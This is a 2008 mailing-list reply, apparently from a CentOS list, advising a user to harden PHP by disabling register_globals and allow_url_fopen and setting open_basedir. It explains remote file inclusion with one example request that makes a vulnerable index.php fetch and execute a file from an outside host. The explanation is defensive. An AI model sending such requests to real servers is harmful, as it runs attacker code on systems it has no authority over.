sbeam schrieb: > On Tuesday 12 August 2008 10:16, Rainer Duffner wrote: > >> Anything in /tmp ? >> >> Disable register_globals and allow_url_fopen. >> Set open_basedir for any virtual hosts to the absolute minimum. >> > > I have mod_security installed now, but I tested a similar attack, and sadly, > it still succeeds as long as allow_url_fopen is on. But this is not CentOS > related. > Yeah, because allow_url_fopen basically means "I want to run code from some random site", in most cases. E.g., when they have implemented a crappy starting-page "index.php" where there is a menu that calls index.php?link=file1.html if item one was clicked. Too bad people can use that to get index.php?link=http://some.geocities.page/foo.gif executed as PHP on your server! (I think it requires both register_globals and allow_url_fopen to be on, but I'm not sure if you can't get it to work with only allow_url_fopen....) cheers, Rainer
